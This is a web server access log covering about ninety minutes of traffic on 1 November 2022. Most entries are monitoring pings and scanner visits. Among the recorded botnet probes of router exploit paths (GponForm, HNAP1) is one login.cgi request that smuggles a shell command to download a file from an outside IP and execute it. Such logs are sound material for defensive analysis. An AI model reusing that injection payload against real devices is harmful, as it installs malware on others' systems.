212.91.246.72 - - [01/Nov/2022:12:45:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.239 - - [01/Nov/2022:12:45:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Nov/2022:12:46:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:12:47:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:12:48:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.239 - - [01/Nov/2022:12:49:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Nov/2022:12:49:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:12:50:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.60 - - [01/Nov/2022:12:51:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.60 - - [01/Nov/2022:12:51:23 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
212.91.246.72 - - [01/Nov/2022:12:51:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:12:52:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:12:53:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:12:54:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:12:55:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:12:56:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:12:57:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:12:58:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.239 - - [01/Nov/2022:12:59:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Nov/2022:12:59:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
109.145.247.47 - - [01/Nov/2022:13:00:09 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://46.19.141.122/dlink%20-O%20-%3E%20/tmp/dlink;chmod%20777%20/tmp/dlink;sh%20/tmp/dlink%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0"
212.91.246.72 - - [01/Nov/2022:13:00:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:01:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:02:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.180.143.7 - - [01/Nov/2022:13:03:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [01/Nov/2022:13:03:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
180.254.225.254 - - [01/Nov/2022:13:04:18 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
212.91.246.72 - - [01/Nov/2022:13:04:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:05:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.99 - - [01/Nov/2022:13:05:50 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.99 - - [01/Nov/2022:13:05:58 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
179.189.200.167 - - [01/Nov/2022:13:06:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36"
185.122.204.30 - - [01/Nov/2022:13:06:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
80.94.92.239 - - [01/Nov/2022:13:06:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
185.122.204.30 - - [01/Nov/2022:13:06:33 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Nov/2022:13:06:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
120.86.255.123 - - [01/Nov/2022:13:07:11 +0100] "POST /HNAP1/ HTTP/1.0" 404 311 "-" "-"
212.91.246.72 - - [01/Nov/2022:13:07:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [01/Nov/2022:13:07:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:13:07:58 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Nov/2022:13:08:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:09:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:10:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.122.204.30 - - [01/Nov/2022:13:10:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.122.204.30 - - [01/Nov/2022:13:10:48 +0100] "POST /HNAP1/ HTTP/1.1" 404 311 "-" "Mozila/5.0"
212.91.246.72 - - [01/Nov/2022:13:11:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:12:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:13:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.239 - - [01/Nov/2022:13:14:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Nov/2022:13:14:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.132.53.101 - - [01/Nov/2022:13:15:33 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.132.53.101 - - [01/Nov/2022:13:15:33 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
212.91.246.72 - - [01/Nov/2022:13:15:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
128.199.35.133 - - [01/Nov/2022:13:16:30 +0100] "\xb7\xf5\xa0/\x1a\x18\x84MB\xe2\x86\x17&8\xf5\x17>]c\x95\x1ey!\x95\xa4\xf5\xe0>\x12y!\x95\x1f}c\x95\x1ey\"\x9d\x1ey!\x95\x1ey!\x95\xb4y!\x95\x1ey" 501 384 "-" "-"
128.199.35.133 - - [01/Nov/2022:13:16:30 +0100] "\x16\x03\x01" 501 318 "-" "-"
128.199.35.133 - - [01/Nov/2022:13:16:30 +0100] "\x16\x03\x01" 501 318 "-" "-"
128.199.35.133 - - [01/Nov/2022:13:16:30 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Nov/2022:13:16:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.60 - - [01/Nov/2022:13:17:26 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.60 - - [01/Nov/2022:13:17:35 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
212.91.246.72 - - [01/Nov/2022:13:17:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:18:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.239 - - [01/Nov/2022:13:19:40 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [01/Nov/2022:13:19:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:20:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:21:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:22:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
87.246.7.177 - - [01/Nov/2022:13:23:00 +0100] "CONNECT www.google.com:443 HTTP/1.1" 405 344 "-" "Go-http-client/1.1"
212.91.246.72 - - [01/Nov/2022:13:23:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:24:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.132.53.101 - - [01/Nov/2022:13:24:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
185.132.53.101 - - [01/Nov/2022:13:24:48 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
167.248.133.44 - - [01/Nov/2022:13:25:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.248.133.44 - - [01/Nov/2022:13:25:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.248.133.44 - - [01/Nov/2022:13:25:28 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.248.133.44 - - [01/Nov/2022:13:25:28 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Nov/2022:13:25:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.193.255.102 - - [01/Nov/2022:13:26:24 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2022:13:26:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:27:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.78 - - [01/Nov/2022:13:28:17 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.78 - - [01/Nov/2022:13:28:43 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
103.53.19.174 - - [01/Nov/2022:13:28:45 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [01/Nov/2022:13:28:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.19 - - [01/Nov/2022:13:29:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
193.47.61.99 - - [01/Nov/2022:13:29:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2022:13:29:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.99 - - [01/Nov/2022:13:29:48 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
212.91.246.72 - - [01/Nov/2022:13:30:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:31:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.25 - - [01/Nov/2022:13:32:29 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
212.91.246.72 - - [01/Nov/2022:13:32:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:33:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:34:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:35:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:36:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.240.236.109 - - [01/Nov/2022:13:37:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
45.227.254.54 - - [01/Nov/2022:13:37:28 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Nov/2022:13:37:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.240.236.109 - - [01/Nov/2022:13:37:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
66.240.236.109 - - [01/Nov/2022:13:38:22 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Nov/2022:13:38:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.240.236.109 - - [01/Nov/2022:13:38:47 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
66.240.236.109 - - [01/Nov/2022:13:38:52 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
80.94.92.239 - - [01/Nov/2022:13:38:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
66.240.236.109 - - [01/Nov/2022:13:39:28 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
66.240.236.109 - - [01/Nov/2022:13:39:29 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
194.180.48.125 - - [01/Nov/2022:13:39:44 +0100] "GET /explore HTTP/1.1" 404 312 "-" "SonyEricssonT100/R101"
212.91.246.72 - - [01/Nov/2022:13:39:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
66.240.236.109 - - [01/Nov/2022:13:39:49 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [01/Nov/2022:13:40:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.94.92.239 - - [01/Nov/2022:13:41:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
193.47.61.99 - - [01/Nov/2022:13:41:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.99 - - [01/Nov/2022:13:41:05 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
212.91.246.72 - - [01/Nov/2022:13:41:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:42:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:43:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
151.243.105.9 - - [01/Nov/2022:13:43:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [01/Nov/2022:13:44:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:45:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:46:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:47:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:48:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:49:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.99 - - [01/Nov/2022:13:49:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
92.118.39.78 - - [01/Nov/2022:13:50:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
188.166.252.67 - - [01/Nov/2022:13:50:42 +0100] "" 501 315 "-" "-"
188.166.252.67 - - [01/Nov/2022:13:50:42 +0100] "\x16\x03\x01" 501 318 "-" "-"
188.166.252.67 - - [01/Nov/2022:13:50:42 +0100] "\x16\x03\x01" 501 318 "-" "-"
188.166.252.67 - - [01/Nov/2022:13:50:43 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Nov/2022:13:50:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:51:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:52:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:53:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.78 - - [01/Nov/2022:13:54:27 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2022:13:54:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.99 - - [01/Nov/2022:13:55:34 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.99 - - [01/Nov/2022:13:55:34 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
212.91.246.72 - - [01/Nov/2022:13:55:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.78 - - [01/Nov/2022:13:56:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2022:13:56:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.62.191.231 - - [01/Nov/2022:13:57:23 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [01/Nov/2022:13:57:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:58:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:13:59:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.222.253.13 - - [01/Nov/2022:14:00:14 +0100] "GET /robots.txt HTTP/1.1" 404 327 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
54.36.148.7 - - [01/Nov/2022:14:00:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
212.91.246.72 - - [01/Nov/2022:14:00:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:01:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:02:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:03:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:04:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:05:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:06:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.99 - - [01/Nov/2022:14:07:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.99 - - [01/Nov/2022:14:07:00 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
212.91.246.72 - - [01/Nov/2022:14:07:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
193.47.61.99 - - [01/Nov/2022:14:08:08 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
193.47.61.99 - - [01/Nov/2022:14:08:08 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Momentum"
212.91.246.72 - - [01/Nov/2022:14:08:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
194.180.48.125 - - [01/Nov/2022:14:08:48 +0100] "GET /explore HTTP/1.1" 404 312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.102 Safari/537.36 Vivaldi/2.6.1566.44"
45.227.254.54 - - [01/Nov/2022:14:09:09 +0100] "\x03" 501 316 "-" "-"
212.91.246.72 - - [01/Nov/2022:14:09:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:10:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:11:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
92.118.39.78 - - [01/Nov/2022:14:12:21 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [01/Nov/2022:14:12:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:13:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:14:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:15:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Nov/2022:14:16:46 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
